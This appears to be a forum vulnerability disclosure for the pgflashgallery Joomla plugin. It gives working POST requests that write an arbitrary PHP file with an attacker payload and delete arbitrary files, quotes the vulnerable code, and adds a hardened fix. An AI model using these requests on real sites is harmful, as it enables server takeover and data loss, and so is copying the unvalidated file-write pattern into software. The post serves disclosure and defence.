17-07-2013, 02:24
pgflashgallery is a Joomla/WordPress plugin developed by http://www.photo-graffix.com.
Fortunately this plugin is not very widespread. Google can, however, find some sites that use it.
I have only tested Joomla sites, but I am convinced the same flaw can be found in the WP plugin. All of the code is insecure. It is possible to log in by setting a GET parameter to 1, but this was, at first glance, the biggest flaw there was.
Exploit:
Code:
POST /joomla/components/com_pgflashgallery/admin_functions2.php HTTP/1.1
Host: www.photo-graffix.com

func=add_new_option&cart_file=filename.php&global_cart_file=1&newop=[payload]
filename.php is created and contains the payload that was supplied.
Vulnerable code:
PHP code:
// $func and $cart_file are read from the request like the other parameters
// (assumed to come from $_POST; these two assignments are not part of the quoted excerpt)
$func = $_POST['func'];
$cart_file = $_POST['cart_file'];
$newop = $_POST['newop'];
$global_cart_file = $_POST['global_cart_file'];
if ($func == "add_new_option") {
    // the client-supplied file name is used directly as the path to write to
    $udfile = $cart_file;
    if (file_exists($udfile)) {
        $newdata = file_get_contents($udfile);
        $newdata = str_replace("&END", $newop."&END", $newdata);
    } else {
        if ($global_cart_file == 1) {
            $newdata = "&PG_BUY=".$newop."&END";
        } else {
            $newdata = "&PG_DESCRIPTION=&PG_RATING=&PG_TAGS=&PG_COUNT=0&PG_COMMENTS=&PG_BUY=".$newop."&END";
        }
    }
    // client-controlled content is written to a client-chosen path with no validation
    $fp = fopen($udfile, "w+");
    $fw = fwrite($fp, $newdata);
    fclose($fp);
}
To delete the file again, the following POST request can be used:
Code:
POST /joomla/components/com_pgflashgallery/admin_functions2.php HTTP/1.1
Host: www.photo-graffix.com

func=delete_cart_options&cart_file=filename.php&del_crtfile=1
Vulnerable code:
PHP code:
// $func is read from the request like the other parameters
// (assumed to come from $_POST; this assignment is not part of the quoted excerpt)
$func = $_POST['func'];
$cart_file = $_POST['cart_file'];
$coption = $_POST['coption'];
$del_crtfile = $_POST['del_crtfile'];
if ($func == "delete_cart_options") {
    $udfile = $cart_file;
    if ($del_crtfile == 1) {
        // the client-supplied path is unlinked as-is; the return value is discarded
        (!unlink($cart_file));
    } else {
        $newdata = file_get_contents($udfile);
        $newdata = str_replace($coption, "", $newdata);
        $fp = fopen($udfile, "w+");
        $fw = fwrite($fp, $newdata);
        fclose($fp);
    }
}
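For comparison, an added hardened variant of the add_new_option handler (example code, not the plugin's own): the cart file name is mapped onto a fixed directory and extension instead of being used as a path, and the write is gated on the server-side session rather than on a request parameter. CART_DIR, the .txt layout and isAdminSession() are assumptions made for this example.

```php
<?php
// Hardened variant of the add_new_option handler (example, not the plugin's code).
// Assumptions: cart files live in a fixed directory CART_DIR and are plain .txt
// files; isAdminSession() stands in for the application's real session check.
session_start();
define('CART_DIR', __DIR__ . '/carts');

function isAdminSession(): bool {
    // Placeholder: authorisation must come from the server-side session,
    // never from a GET/POST parameter the client can set.
    return isset($_SESSION['pg_admin']) && $_SESSION['pg_admin'] === true;
}

// Map the submitted cart name onto a file inside CART_DIR, or null if it is not acceptable.
function resolveCartFile(string $name): ?string {
    // Only a short alphanumeric basename is accepted and the extension is fixed,
    // so values such as "filename.php" or "../../configuration.php" are rejected.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $name)) {
        return null;
    }
    return CART_DIR . '/' . $name . '.txt';
}

function addNewOption(string $cartName, string $newop, bool $globalCart): bool {
    if (!isAdminSession()) {
        return false;
    }
    $udfile = resolveCartFile($cartName);
    if ($udfile === null) {
        return false;
    }
    if (file_exists($udfile)) {
        $newdata = str_replace("&END", $newop . "&END", file_get_contents($udfile));
    } elseif ($globalCart) {
        $newdata = "&PG_BUY=" . $newop . "&END";
    } else {
        $newdata = "&PG_DESCRIPTION=&PG_RATING=&PG_TAGS=&PG_COUNT=0&PG_COMMENTS=&PG_BUY=" . $newop . "&END";
    }
    // Single locked write instead of fopen("w+")/fwrite/fclose on an unchecked path.
    return file_put_contents($udfile, $newdata, LOCK_EX) !== false;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['func'] ?? '') === 'add_new_option') {
    $ok = addNewOption((string)($_POST['cart_file'] ?? ''), (string)($_POST['newop'] ?? ''),
                       ($_POST['global_cart_file'] ?? '') === '1');
    http_response_code($ok ? 200 : 400);
}
```

The delete_cart_options branch needs the same resolveCartFile() mapping and session check before it calls unlink(), otherwise the path-deletion half of the issue remains.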